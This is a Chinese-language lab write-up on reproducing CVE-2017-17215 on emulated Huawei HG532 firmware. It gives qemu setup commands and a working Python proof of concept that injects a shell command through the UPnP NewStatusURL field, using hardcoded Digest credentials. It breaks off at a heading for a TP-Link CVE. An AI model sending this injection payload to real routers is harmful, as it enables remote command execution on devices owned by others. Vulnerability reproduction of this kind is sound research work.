固件获取

https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/HUAWEI/CVE-2017-17215/firmware

提取

binwalk -Mer HG532eV100R001C01B020_upgrade_packet.bin

启动qemu-system

sudo qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

传输文件

sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.153.1/24 up
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.153.11/24 up
sudo brctl addif Virbr0 tap0

ifconfig eth0 192.168.153.2/24 up
scp -r squashfs-root/ root@192.168.153.2:~/

启动固件

#挂载dev和proc
mount -o bind /dev ./squashfs-root/dev
mount -t proc /proc ./squashfs-root/proc
chroot squashfs-root/ /bin/sh

然后用ssh另起一个终端

ssh root@192.168.153.2

chroot squashfs-root /bin/sh
upnp
mic

到这里ip会被修改，通过qemu的终端改回来

ifconfig eth0 192.168.153.2/24 up
ifconfig br0 192.168.153.11/24 up

不知道为什么浏览器访问不了，但是poc能通

POC

import requests 
headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;mkdir hell;</NewStatusURL>
   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://192.168.153.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

漏洞分析

通过官方poc知道漏洞点在NewStatusURL

需要把NewStatusURL这里patch了才能反编译

猜测一下，a13应该是NewStatusURL传入的参数，并且这个参数用户可控，导致了任意命令执行

CVE-2017-13772

固件获取

https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/TP-Link/CVE-2017-13772/firmware